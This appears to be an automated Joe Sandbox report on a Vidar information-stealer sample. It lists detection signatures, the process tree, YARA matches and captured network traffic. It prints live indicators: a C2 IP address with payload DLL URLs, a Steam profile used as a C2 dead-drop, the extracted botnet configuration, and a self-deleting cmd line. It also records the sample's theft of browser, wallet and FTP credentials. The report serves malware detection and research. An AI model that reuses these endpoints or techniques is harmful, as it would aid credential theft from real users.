Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1443407
MD5:75db6dfdebb9bf0d98acfc15f2219c62
SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 75DB6DFDEBB9BF0D98ACFC15F2219C62)
    • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5392 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x221f0:$s1: JohnDoe
      • 0x31f80:$s1: JohnDoe
      • 0x221e8:$s2: HAL9TH
      00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: file.exe PID: 6352JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x221f0:$s1: JohnDoe
              • 0x31f80:$s1: JohnDoe
              • 0x221e8:$s2: HAL9TH
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                0.2.file.exe.ab0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://95.217.240.101/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllSophos S4: Label: malware repository uri
                  Source: https://95.217.240.101/softokn3.dlleSAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllsS9Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllwT=Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/DAvira URL Cloud: Label: malware
                  Source: https://t.me/k0monoAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/Avira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badgesAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/OAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllIAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllyS#Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vcruntime140.dllAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C7C6C80
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,0_2_00AC5AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 95.217.240.101 95.217.240.101
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 5713Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 98013Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
